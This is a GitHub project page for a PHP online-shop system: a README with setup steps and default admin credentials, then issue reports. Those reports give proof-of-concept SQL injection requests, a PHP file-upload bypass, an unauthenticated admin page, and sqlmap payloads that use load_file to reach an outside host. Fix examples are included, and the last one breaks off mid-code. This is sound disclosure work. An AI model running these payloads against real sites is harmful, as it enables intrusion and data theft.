
online-shopping-system-advanced's Introduction


Updated project with extra Features like WISHLIST, List Orders, add Reviews, updated routing, resolved search bug is available for Premium


Things I code with

npm html5 vue.js Django Flutter JavaScript Mysql postgresql Amazon_AWS Css Sass Styled Components git Heroku Docker angular MongoDB Nodejs Google Cloud Platform TypeScript

Projects We develop

  • Vue JS
  • Nuxt JS
  • Python
  • Django
  • PHP and MYSQL
  • Angular JS
  • React JS
  • AI/ML

Projects with installation support and code explanation are available for Premium; contact gmail: [email protected] or visit: Projects Wall

Installation

  1. Install XAMPP or WAMPP.

  2. Open the XAMPP Control Panel and start [apache] and [mysql].

  3. Download the project from GitHub (https://github.com/PuneethReddyHC/online-shopping-system-with-advanced-admin-page.git)
    OR follow these Git Bash commands:

    i>cd C:\xampp\htdocs\

    ii>git clone https://github.com/PuneethReddyHC/online-shopping-system-with-advanced-admin-page.git

  4. Extract the files in C:\xampp\htdocs.

  5. Open the link localhost/phpmyadmin.

  6. Click on New in the side navbar.

  7. Give the database the name (onlineshop) and hit the Create button.

  8. After creating the database, click on Import.

  9. Browse to the file in the directory [online-shopping-system-with-advanced-admin-page/database/onlineshop.sql].

  10. after importing successfully.

  11. Open any browser and type http://localhost/online-shopping-system-with-advanced-admin-page-master.

  12. First register and then log in.

  13. Admin login details: Email=[email protected] or username = admin and Password=123456789.

If you like my project

Buy me a cup of coffee

Visit my other repositories with different admin pages at the links below:

https://github.com/PuneethReddyHC/online-shopping-system-advanced

https://github.com/PuneethReddyHC/event-management

If you like my project hit a star button


Contributing

Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

Please make sure to update tests as appropriate.


online-shopping-system-advanced's Issues

How can I run this project?

I tried with readme instruction.

But it does not work. It comes up like this:

Object not found! The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. If you think this is a server error, please contact the webmaster. Error 404 localhost Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8

Give a solution for this.

Found a vulnerability

Vulnerability file address

admin/edit_user.php, from line 4: the $user_id parameter is controllable; the parameter user_id can be passed through POST, and $user_id is not protected from SQL injection, resulting in SQL injection.

$user_id=$_REQUEST['user_id'];

$result=mysqli_query($con,"select user_id, email, password from user_info where user_id='$user_id'")or die ("query 1 incorrect.......");

list($user_id,$user_name,$user_password)=mysqli_fetch_array($result);

POC

GET /admin/edit_user.php?user_id=1%27+union+select+1,user(),3%23 HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=iq8aj0cq3p4rf0s9m3864gtkr0
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220721150213979

Found a vulnerability

Vulnerability file address

admin/orders.php, from line 5: the $order_id parameter is controllable; the parameter order_id can be passed through GET, and $order_id is not protected from SQL injection, resulting in SQL injection.

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$order_id=$_GET['order_id'];

/*this is delet query*/
mysqli_query($con,"delete from orders where order_id='$order_id'")or die("delete query is incorrect...");
} 

POC

GET /admin/orders.php?action=delete&order_id=bbbb' AND 3916=BENCHMARK(5000000,MD5(0x7748556f))-- hdtf HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220729214016877

Found a vulnerability

Vulnerability file address

product.php, from line 60: the $product_id parameter is controllable; the parameter p can be passed through GET, and $product_id is not protected from SQL injection, resulting in SQL injection.

......
......
......
<?php 
include 'db.php';
$product_id = $_GET['p'];

$sql = " SELECT * FROM products ";
$sql = " SELECT * FROM products WHERE product_id = $product_id";
if (!$con) {
  die("Connection failed: " . mysqli_connect_error());
}
$result = mysqli_query($con, $sql);
......
......
......

POC

GET /product.php?p=1 AND (SELECT 9365 FROM (SELECT(SLEEP(5)))RcRq) HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220729151216485

image-20220729150245763
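
The integer-id injections reported above for product.php (`p`) and admin/orders.php (`order_id`) can be closed by validating the id and binding it as a parameter. This is an added example, not code from the repository; it assumes `$con` is the mysqli connection that db.php creates, and `request_id`, `product_from_request` and `delete_order_from_request` are hypothetical helper names.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Table and column names are taken
// from the snippets quoted in the issues; helper names are hypothetical.
// get_result() needs the mysqlnd driver.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // throw on DB errors

/** Return $source[$key] as a positive integer, or null if it is anything else. */
function request_id(array $source, string $key): ?int
{
    $id = filter_var($source[$key] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** product.php: the product row, or null for a malformed or unknown id. */
function product_from_request(mysqli $con, array $query): ?array
{
    $product_id = request_id($query, 'p');
    if ($product_id === null) {
        return null;                    // "1 AND (SELECT ...)" never reaches the database
    }
    // The id travels as a bound integer, separate from the SQL text.
    $stmt = $con->prepare('SELECT * FROM products WHERE product_id = ?');
    $stmt->bind_param('i', $product_id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** admin/orders.php: number of rows deleted (0 for a malformed id or other action). */
function delete_order_from_request(mysqli $con, array $query): int
{
    if (($query['action'] ?? '') !== 'delete') {
        return 0;
    }
    $order_id = request_id($query, 'order_id');
    if ($order_id === null) {
        return 0;
    }
    $stmt = $con->prepare('DELETE FROM orders WHERE order_id = ?');
    $stmt->bind_param('i', $order_id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;
}

// Usage in product.php (admin/orders.php calls delete_order_from_request($con, $_GET)).
include 'db.php';
$product = product_from_request($con, $_GET);
if ($product === null) {
    http_response_code(404);
    exit('Product not found');
}
```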

Can not access to My Profile Page

Dear Mr.Puneeth, @PuneethReddyHC ,

I tried to access the My Profile page to change my data (email) but I cannot access it. I liked your project and I sent you an email asking for permission to develop this part (My Profile page) of the project to improve it.

I'm waiting for your reply.

Regards,
Doaa

Found a vulnerability

Vulnerability file address

admin/cosmetics_list.php, from line 5: the $product_id parameter is controllable; the parameter product_id can be passed through GET, and $product_id is not protected from SQL injection, resulting in SQL injection.

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$product_id=$_GET['product_id'];
///////picture delete/////////
$result=mysqli_query($con,"select product_image from products where product_id='$product_id")
or die("query is incorrect...");

POC

GET /admin/cosmetics_list.php?action=delete&product_id=cccc' AND (SELECT 7939 FROM (SELECT(SLEEP(5)))sdWF)-- xcNg HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220729214115057

Found a vulnerability

Vulnerability file address

register.php, from line 4: the $address2 parameter is controllable; the parameter address2 can be passed through POST, and $address2 is not protected from SQL injection, resulting in SQL injection.

<?php
session_start();
include "db.php";
if (isset($_POST["f_name"])) {

  $f_name = $_POST["f_name"];
  $l_name = $_POST["l_name"];
  $email = $_POST['email'];
  $password = $_POST['password'];
  $repassword = $_POST['repassword'];
  $mobile = $_POST['mobile'];
  $address1 = $_POST['address1'];
  $address2 = $_POST['address2'];
  $name = "/^[a-zA-Z ]+$/";
  $emailValidation = "/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9]+(\.[a-z]{2,4})$/";
  $number = "/^[0-9]+$/";
......
......
......
$sql = "INSERT INTO `user_info` 
		(`user_id`, `first_name`, `last_name`, `email`, 
		`password`, `mobile`, `address1`, `address2`) 
		VALUES (NULL, '$f_name', '$l_name', '$email', 
		'$password', '$mobile', '$address1', '$address2')";
		$run_query = mysqli_query($con,$sql);

POC

success

POST /register.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 166
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25

f_name=a&l_name=a&email=2%40qq.com&password=123456789&repassword=123456789&mobile=1111111111&address1=123&address2=7' and if(ascii(mid(user(),1,1))=114,sleep(2),0));#

failed

POST /register.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 166
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25

f_name=a&l_name=a&email=3%40qq.com&password=123456789&repassword=123456789&mobile=1111111111&address1=123&address2=7' and if(ascii(mid(user(),1,1))=115,sleep(2),0));#

Attack results pictures

success

image-20220729191256273

failed

image-20220729191223116

Register

Registered account is not present in the database and I am unable to log in, bro

SQL Injection1

Vulnerability file address

admin/edit_user.php, from line 4: the $user_id parameter is controllable; the parameter user_id can be passed through POST, and $user_id is not protected from SQL injection, resulting in SQL injection.

$user_id=$_REQUEST['user_id'];

$result=mysqli_query($con,"select user_id, email, password from user_info where user_id='$user_id'")or die ("query 1 incorrect.......");

list($user_id,$user_name,$user_password)=mysqli_fetch_array($result);

POC

GET /admin/edit_user.php?user_id=1%27+union+select+1,user(),3%23 HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=iq8aj0cq3p4rf0s9m3864gtkr0
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220721150213979

Found a vulnerability

Vulnerability file address

admin/index.php: there is no authentication check on the cookie, session or header, resulting in unauthorized access.

<?php

session_start();
?>
..........
..........
..........
<?php  //success message
if(isset($_POST['success'])) {
$success = $_POST["success"];
echo "<h1 style='color:#0C0'>Your Product was added successfully &nbsp;&nbsp;  <span class='glyphicon glyphicon-ok'></h1></span>";
}
?></h3>
	</div>
</div></div></div>
<?php include("include/js.php"); ?>
</body>
</html>

POC

GET /admin/ HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220727170250049
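
The snippet in the issue above calls `session_start()` but never checks what the session contains. The guard below is an added example, not code from the repository; the file name `admin/include/auth.php`, the `admin_id` session key and the `login.php` redirect target are assumptions.

```php
<?php
declare(strict_types=1);

// admin/include/auth.php (hypothetical file name).
// Added example, not the project's code. Requires PHP 7.3+ for the
// array form of session_set_cookie_params().

/** Start the session once, with cookie flags that keep the id away from scripts. */
function start_admin_session(): void
{
    if (session_status() === PHP_SESSION_NONE) {
        session_set_cookie_params([
            'httponly' => true,
            'samesite' => 'Lax',
            'secure'   => !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off',
        ]);
        session_start();
    }
}

/** True only when the session carries the marker written by mark_admin_logged_in(). */
function is_admin_session(array $session): bool
{
    return isset($session['admin_id'])
        && is_int($session['admin_id'])
        && $session['admin_id'] > 0;
}

/** Call once, right after the admin's credentials have been verified. */
function mark_admin_logged_in(int $admin_id): void
{
    session_regenerate_id(true);        // fresh id, so a pre-login cookie is worthless
    $_SESSION['admin_id'] = $admin_id;  // 'admin_id' is an assumed key name
}

/** Gate for every script under admin/: call before any output or query. */
function require_admin(): void
{
    start_admin_session();
    if (!is_admin_session($_SESSION)) {
        header('Location: login.php');  // assumed location of the admin login form
        exit;                           // without exit the rest of the page still runs
    }
}

// At the very top of admin/index.php and every other admin script,
// replacing the bare session_start():
//   require __DIR__ . '/include/auth.php';
//   require_admin();
```

A session cookie that merely exists, as in the request shown in the issue, does not pass this check; only a session that went through `mark_admin_logged_in()` does.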

Password Encryption and SQL Injection Vulnerability in config.php

  1. Password Encryption:
    The code uses the outdated md5 function for password encryption, which is considered weak. It's recommended to use password_hash and password_verify for more secure password handling.

  2. SQL Injection:
    The code is susceptible to SQL injection attacks as it directly interpolates user inputs into SQL queries. Using prepared statements helps prevent SQL injection by separating data from the query.

Fix Details:

  1. Password Encryption:

    • Issue: Using md5 for password hashing is insecure.
    • Fix:
      // Change this line
      $password = md5($password_1);
      
      // To
      $hashed_password = password_hash($password_1, PASSWORD_DEFAULT);
  2. SQL Injection:

    • Issue: Lack of prepared statements in the user check query.
    • Fix:
      // Change this block
      $user_check_query = "SELECT * FROM register WHERE Name='$username' OR email='$email' LIMIT 1";
      $result = mysqli_query($db, $user_check_query);
      
      // To
      $user_check_query = $db->prepare("SELECT * FROM register WHERE Name=? OR email=? LIMIT 1");
      $user_check_query->bind_param('ss', $username, $email);
      $user_check_query->execute();
      $result = $user_check_query->get_result();

Additional Recommendations:

  1. Error Handling:

    • Add error handling for database queries to provide meaningful error messages.
    $result = $user_check_query->get_result();
    if (!$result) {
        die('Error executing query: ' . $user_check_query->error);
    }

  2. Session Start Check:

    • Check if the session is already started before calling session_start() to avoid potential issues.
    if (session_status() == PHP_SESSION_NONE) {
        session_start();
    }

  3. Logging Out:

    • If you have a logout functionality, include a secure way to destroy the session.
    if (isset($_GET['logout'])) {
        session_destroy();
        unset($_SESSION['Name']);
        header("location: index.php");
        exit; // stop executing the page after sending the redirect
    }

Lots of SQL Injection Vulnerabilities

There are lots of SQL injection issues throughout the system. I would like to fix it. It'll take a whole reconstruction of all the queries using prepared statements. Acknowledge if it's fine to fix.

Security vulnerability responsible disclosure

Hello,

CERT PL found a security vulnerability in this repository. How can we report this privately? We don't see any security policy describing how such vulnerabilities should be reported.

File upload vulnerability1

Vulnerability file address

admin/add_product.php, from line 18: it only restricts the type of the file and does not restrict the file suffix, and the file type check can be bypassed just by modifying the HTTP Content-Type field.

//picture coding
$picture_name=$_FILES['picture']['name'];
$picture_type=$_FILES['picture']['type'];
$picture_tmp_name=$_FILES['picture']['tmp_name'];
$picture_size=$_FILES['picture']['size'];

if($picture_type=="image/jpeg" || $picture_type=="image/jpg" || $picture_type=="image/png" || $picture_type=="image/gif")
{
	if($picture_size<=50000000)
	
		$pic_name=time()."_".$picture_name;
		move_uploaded_file($picture_tmp_name,"../product_images/".$pic_name);

POC

POST /admin/add_product.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------254658479040777430842599586609
Content-Length: 1040
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/admin/add_product.php
Cookie: PHPSESSID=9g99r79stt08ctlc0nn1s1jci4
Upgrade-Insecure-Requests: 1

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_name"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="details"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="picture"; filename="1.php"
Content-Type: image/gif

GIF89a<?php phpinfo(); ?>

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="price"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_type"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="brand"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="tags"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="submit"


-----------------------------254658479040777430842599586609--

Attack results pictures

The uploaded php file is prefixed with a 10-digit timestamp, so it needs to be blasted

image-20220719171259438

image-20220719171552494

Found a vulnerability

Vulnerability file address

admin/manage_users.php, from line 4: the $user_id parameter is controllable; the parameter user_id can be passed through POST, and $user_id is not protected from SQL injection, resulting in SQL injection.

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$user_id=$_GET['user_id'];
/*this is delet quer*/
mysqli_query($con,"delete from user_info where user_id='$user_id'")or die("query is incorrect...");
}

POC

GET /admin/manage_users.php?user_id=' OR (SELECT 7316 FROM (SELECT(SLEEP(5)))lqxS)-- nZPW&action=delete HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://www.onsp.net/admin/manage_users.php?action=1&user_id=5
Cookie: PHPSESSID=iq8aj0cq3p4rf0s9m3864gtkr0
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220721154354881

Multiple SQLi

For termination
STATUS: CRITICAL!
Dear pseudo developer, please terminate this thing, if you know how, or fix it if you understand what actually is happening.
BR @nu11secur1ty

Parameter: cid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' OR NOT 4084=4084 AND 'icSi'='icSi

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT (ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(select load_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#

Parameter: password (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]&password=e2H!l7r!I2' AND (SELECT 7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on

Parameter: p (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
    Payload: p=MAKE_SET(3691=3691,8073)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: p=(SELECT 4211 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(4211=4211,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)
    Payload: p=60'+(select load_file('\\\\9x7re23uz38xdqq4hj8u4e8ba2gv4vzjqmed13ps.tupmangal.net\\eyn'))+' (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)

All:

[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cid parameter]]
[1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php [password parameter]]
[1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [p parameter]]
[1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php [email parameter]]
[1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [name parameter]]

online-shopping-system-v2 error

thanks for the free online shop!!
but unfortunately it is not error-free and finished. can you help me with this

Notice: Trying to access array offset on value of type null in login.php on line 17
login.zip

-> $_SESSION["uid"] = $row["user_id"];
-> $_SESSION["name"] = $row["first_name"];
$ip_add = getenv("REMOTE_ADDR");

+++thanks from italy


Trying to get in touch regarding a security issue

Hey there!

I'd like to report a security issue but cannot find contact instructions on your repository.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

orders

unable to view the orders in the admin panel

web page not working

It's showing this:

Warning: mysqli_connect(): (HY000/1044): Access denied for user ''@'localhost' to database 'ecommerece' in C:\xampp\htdocs\online-shopping-system-advanced-master\db.php on line 9
Connection failed: Access denied for user ''@'localhost' to database 'ecommerece'

category total count is wrong

In my case I just left 3 categories and when you see the categories, the first one has all the items and the others none

original and wrong query in file action.php

#sql = "SELECT COUNT(*) AS count_items FROM products WHERE product_cat=$i";

this is the correct query

$sql = "SELECT COUNT(*) AS count_items FROM products WHERE product_cat=$cid";

Password not encrypted

The password which a person uses when registering is not encrypted before being stored in the database. This makes the accounts not safe from hackers.

Found a vulnerability

Vulnerability file address

admin/clothes_list.php, from line 5: the $product_id parameter is controllable; the parameter product_id can be passed through GET, and $product_id is not protected from SQL injection, resulting in SQL injection.

if(isset($_GET['action']) && $_GET['action']!="" && $_GET['action']=='delete')
{
$product_id=$_GET['product_id'];
///////picture delete/////////
$result=mysqli_query($con,"select product_image from products where product_id='$product_id'")
or die("query is incorrect...");

POC

GET /admin/clothes_list.php?action=delete&product_id=aaaaa' AND (SELECT 1853 FROM (SELECT(SLEEP(5)))zDGS)-- ZvnN HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1

Attack results pictures

image-20220729192923919

Found a vulnerability

Vulnerability file address

admin/add_product.php, from line 18: it only restricts the type of the file and does not restrict the file suffix, and the file type check can be bypassed just by modifying the HTTP Content-Type field.

//picture coding
$picture_name=$_FILES['picture']['name'];
$picture_type=$_FILES['picture']['type'];
$picture_tmp_name=$_FILES['picture']['tmp_name'];
$picture_size=$_FILES['picture']['size'];

if($picture_type=="image/jpeg" || $picture_type=="image/jpg" || $picture_type=="image/png" || $picture_type=="image/gif")
{
	if($picture_size<=50000000)
	
		$pic_name=time()."_".$picture_name;
		move_uploaded_file($picture_tmp_name,"../product_images/".$pic_name);

POC

POST /admin/add_product.php HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------254658479040777430842599586609
Content-Length: 1040
Origin: http://www.onsp.net
Connection: close
Referer: http://www.onsp.net/admin/add_product.php
Cookie: PHPSESSID=9g99r79stt08ctlc0nn1s1jci4
Upgrade-Insecure-Requests: 1

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_name"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="details"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="picture"; filename="1.php"
Content-Type: image/gif

GIF89a<?php phpinfo(); ?>

-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="price"

1
-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="product_type"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="brand"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="tags"


-----------------------------254658479040777430842599586609
Content-Disposition: form-data; name="submit"


-----------------------------254658479040777430842599586609--

Attack results pictures

The uploaded php file is prefixed with a 10-digit timestamp, so it needs to be blasted

image-20220719171259438

image-20220719171552494
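
Both admin/add_product.php upload reports on this page come down to the same two trust decisions: the handler believes the client-sent Content-Type and keeps the client-sent file name. The handler below is an added example, not code from the repository; the allow-list, the 2 MiB limit and the function names are assumptions, while the `picture` field, the `../product_images/` directory and the `product_image` column come from the quoted snippets. It needs the fileinfo extension.

```php
<?php
declare(strict_types=1);

// Added example, not the project's code.
const ALLOWED_IMAGES = [            // type detected from content => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_PICTURE_BYTES = 2 * 1024 * 1024;   // assumed limit: 2 MiB

/** Validate one entry of $_FILES and return the extension it will be stored under. */
function checked_image_extension(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload did not complete');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if (filesize($file['tmp_name']) > MAX_PICTURE_BYTES) {
        throw new RuntimeException('File too large');
    }
    // $file['type'] (the request's Content-Type) and $file['name'] are
    // client-supplied and deliberately not consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED_IMAGES)) {
        throw new RuntimeException('Unsupported image type');
    }
    return ALLOWED_IMAGES[$mime];
}

/** Move the upload into $dir under a server-chosen name and return that name. */
function store_product_image(array $file, string $dir): string
{
    $ext = checked_image_extension($file);
    // A file that starts with a GIF header can still pass content sniffing.
    // What keeps it inert is that it is saved as "<random>.gif", never under
    // the uploaded name, so the server has no .php file to execute.
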